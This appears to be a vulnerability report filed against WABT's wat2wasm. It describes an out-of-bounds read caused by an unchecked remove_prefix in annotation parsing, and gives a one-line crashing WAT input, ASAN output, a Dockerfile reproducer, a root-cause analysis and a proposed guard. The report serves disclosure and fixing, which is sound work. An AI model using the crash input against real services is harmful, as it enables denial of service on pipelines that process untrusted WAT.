heap OOB read / SEGV in BinaryWriter::WriteExpr #2742

@DavidKorczynski

Description of the vulnerability and its impact

When wat2wasm processes a WAT file containing a @custom annotation inside a function
body (e.g. @custom "a"), ParseCodeMetadataAnnotation calls name.remove_prefix(14)
on the token text "custom" (6 bytes) without first checking that the name starts with
"metadata.code.". This violates the C++ precondition for std::string_view::remove_prefix,
producing a corrupted string_view whose pointer is advanced 14 bytes from the start of the
6-byte token text and whose length is 0xFFFFFFFFFFFFFFF8 (unsigned wraparound). The corrupted
view is stored in a CodeMetadataExpr node and later used as a key in
std::unordered_map<std::string_view, CodeMetadataSection> inside BinaryWriter::WriteExpr,
causing the hash function to attempt a read of ~18 exabytes from an invalid address.

Impact: Deterministic crash (DoS) of any pipeline running wat2wasm --enable-annotations
on untrusted input. The corrupted pointer is heap-relative, creating a theoretical (but
non-trivial) memory disclosure primitive.

First faulty condition: src/wast-parser.cc:2314, where name.remove_prefix(sizeof("metadata.code.") - 1) is called without a prior starts_with("metadata.code.") guard.

Crash site: src/binary-writer.cc:1189, where BinaryWriter::WriteExpr hashes the corrupted string_view.


How to reproduce

echo '(module(func(@custom "a")))' > poc.wat
wat2wasm --enable-annotations poc.wat -o /dev/null

Crashes deterministically on current HEAD. No special heap layout or environment required.

ASAN output:

==10==ERROR: AddressSanitizer: SEGV on unknown address 0x603000010000
==10==The signal is caused by a READ memory access.
    #0 in std::_Hash_bytes(void const*, unsigned long, unsigned long)
    #1 in std::hash<std::string_view>::operator()
    #2 in std::unordered_map<std::string_view, ...>::operator[]
    #3 in wabt::(anonymous namespace)::BinaryWriter::WriteExpr
           /build/repo/src/binary-writer.cc:1189
    #4 in BinaryWriter::WriteExprList /build/repo/src/binary-writer.cc:1203
    #5 in BinaryWriter::WriteFunc    /build/repo/src/binary-writer.cc:1229
    #6 in BinaryWriter::WriteModule  /build/repo/src/binary-writer.cc:1737
    #7 in wabt::WriteBinaryModule    /build/repo/src/binary-writer.cc:1947
    #8 in ProgramMain                /build/repo/src/tools/wat2wasm.cc:152

The following Dockerfile is a full end-to-end reproducer:

FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive
ENV TZ=UTC

RUN apt-get update && apt-get install -y --no-install-recommends \
    git \
    cmake \
    ninja-build \
    clang-18 \
    llvm-18 \
    libclang-rt-18-dev \
    python3 \
    ca-certificates \
    && rm -rf /var/lib/apt/lists/*

# Clone wabt at HEAD (unpatched as of April 2026)
RUN git clone --depth=1 --recurse-submodules https://github.com/WebAssembly/wabt.git /build/repo \
    && cd /build/repo && git log -1 --oneline

# Build wat2wasm with ASAN using clang-18
RUN mkdir -p /build/repo/build && \
    cmake -S /build/repo -B /build/repo/build \
        -GNinja \
        -DCMAKE_BUILD_TYPE=Debug \
        -DCMAKE_C_COMPILER=clang-18 \
        -DCMAKE_CXX_COMPILER=clang++-18 \
        "-DCMAKE_C_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_CXX_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_EXE_LINKER_FLAGS=-fsanitize=address" \
        -DBUILD_TESTS=OFF \
    && ninja -C /build/repo/build wat2wasm

# Embed the PoC: 27-byte WAT text that triggers the bug
RUN echo '(module(func(@custom "a")))' > /build/poc.wat

# Show the vulnerable source region and then trigger the ASAN crash
CMD ["/bin/sh", "-c", \
    "echo '=== Vulnerable source (src/wast-parser.cc — ParseCodeMetadataAnnotation) ===' && \
     grep -n 'remove_prefix' /build/repo/src/wast-parser.cc | head -5 && \
     echo '' && \
     echo '=== ASAN crash ===' && \
     ASAN_OPTIONS='detect_leaks=0:print_stacktrace=1' \
     ASAN_SYMBOLIZER_PATH=$(which llvm-symbolizer-18) \
       /build/repo/build/wat2wasm --enable-annotations /build/poc.wat -o /dev/null 2>&1; exit 1"]

Which WABT tools or library functions are affected

  • Tool: wat2wasm
  • Vulnerable function: WastParser::ParseCodeMetadataAnnotation (src/wast-parser.cc:2314)
  • Crash site: BinaryWriter::WriteExpr (src/binary-writer.cc:1189)

Which WebAssembly features must be enabled

--enable-annotations — the crash is only reachable when annotation parsing is
enabled. The @custom token is only accepted under this flag.


Root Cause Analysis

Background

wabt's wat2wasm tool compiles WebAssembly Text Format (WAT) to binary. The --enable-annotations flag activates support for WAT annotations — syntactic extensions of the form (@name ...). One annotation type is metadata.code.*, used to attach custom metadata to instructions for toolchain pipelines. The annotation name must begin with the 14-byte prefix "metadata.code." for this feature to work correctly.

Vulnerable Code

// src/wast-parser.cc:2310 — WastParser::ParseCodeMetadataAnnotation
Result WastParser::ParseCodeMetadataAnnotation(ExprList* exprs) {
  WABT_TRACE(ParseCodeMetadataAnnotation);
  Token tk = Consume();
  std::string_view name = tk.text();
  name.remove_prefix(sizeof("metadata.code.") - 1);  // line 2314 — BUG
  std::string data_text;
  CHECK_RESULT(ParseQuotedText(&data_text, false));
  std::vector<uint8_t> data(data_text.begin(), data_text.end());
  exprs->push_back(std::make_unique<CodeMetadataExpr>(name, std::move(data)));
  EXPECT(Rpar);
  return Result::Ok;
}

Plain explanation: The function assumes that any annotation token reaching it begins with the 14-byte prefix "metadata.code." and strips that prefix unconditionally. When the token is "custom" (6 bytes), stripping 14 bytes is undefined behavior — it produces a string_view pointing past the end of the token buffer with a wrapped, near-maximal length.

Precise explanation: sizeof("metadata.code.") - 1 is 14. Calling remove_prefix(14) on a string_view of size 6 advances the internal data_ pointer by 14 bytes (into adjacent heap memory or lexer state) and sets size_ to 6 - 14 = -8, which as size_t is 0xFFFFFFFFFFFFFFF8. The resulting string_view is stored — without copying — into CodeMetadataExpr::name (a std::string_view member). At binary write time, BinaryWriter::WriteExpr uses this as a key in std::unordered_map<std::string_view, CodeMetadataSection>, which hashes the string_view by calling std::_Hash_impl::hash(data_ptr, 0xFFFFFFFFFFFFFFF8) — a read of ~18 exabytes from an invalid address, immediately caught by ASAN as a SEGV.
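
The size arithmetic above can be checked in isolation. The following is a minimal sketch, not wabt code: UncheckedSizeAfterRemovePrefix and kPrefixLen are hypothetical names introduced for illustration. It reproduces only the unsigned subtraction and does not call remove_prefix out of contract, so it has no undefined behavior itself.

```cpp
#include <cstddef>
#include <string_view>

// Hypothetical helper (not part of wabt): the size a string_view would end up
// with if remove_prefix(n) were applied without a bounds check. Only the
// unsigned subtraction is modelled; no memory is read.
constexpr std::size_t UncheckedSizeAfterRemovePrefix(std::string_view sv,
                                                     std::size_t n) {
  return sv.size() - n;  // size_t arithmetic wraps modulo 2^N, well-defined
}

// Same expression as the one at src/wast-parser.cc:2314.
constexpr std::size_t kPrefixLen = sizeof("metadata.code.") - 1;
static_assert(kPrefixLen == 14);

// "custom" is 6 bytes, so 6 - 14 wraps to the size_t representation of -8.
static_assert(UncheckedSizeAfterRemovePrefix("custom", kPrefixLen) ==
              static_cast<std::size_t>(-8));

// Assumption: on a platform with a 64-bit size_t this is the length reported
// in the issue.
static_assert(sizeof(std::size_t) != 8 ||
              static_cast<std::size_t>(-8) == 0xFFFFFFFFFFFFFFF8ull);
```

The file compiles under C++17 only if every static_assert holds, which confirms the 14-byte prefix length and the wrapped size without running the vulnerable path.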

The root cause is the absence of a guard in ParseCodeMetadataAnnotation verifying that the annotation name actually starts with "metadata.code." before calling remove_prefix. A corresponding guard exists at module level (in the lexer's annotation token accumulation), but not in the expression-level dispatcher.
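
One possible shape for the missing guard is sketched below. This is not a patch from the wabt maintainers: StripCodeMetadataPrefix and kCodeMetadataPrefix are hypothetical names, and how a failed check should be reported by the parser is left open. The prefix test uses substr rather than starts_with so that it also builds as C++17.

```cpp
#include <optional>
#include <string_view>

// Hypothetical names, not taken from the wabt source tree.
constexpr std::string_view kCodeMetadataPrefix = "metadata.code.";

// Returns the part of `name` after "metadata.code.", or std::nullopt when the
// prefix is absent. remove_prefix is only reached once the prefix is known to
// be present, so its precondition (n <= size()) always holds.
constexpr std::optional<std::string_view> StripCodeMetadataPrefix(
    std::string_view name) {
  // substr(0, n) clamps n to size(), so short names such as "custom" are safe.
  if (name.substr(0, kCodeMetadataPrefix.size()) != kCodeMetadataPrefix) {
    return std::nullopt;
  }
  name.remove_prefix(kCodeMetadataPrefix.size());
  return name;
}

// The token from the PoC is rejected instead of producing a corrupted view.
static_assert(!StripCodeMetadataPrefix("custom").has_value());
// A well-formed annotation name yields the suffix after the prefix.
static_assert(*StripCodeMetadataPrefix("metadata.code.branch_hint") ==
              "branch_hint");
```

In ParseCodeMetadataAnnotation, a std::nullopt result would presumably become a parse error before any CodeMetadataExpr is constructed. The returned view still refers to the token's storage, so this sketch addresses only the out-of-contract remove_prefix, not the lifetime of the stored name.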
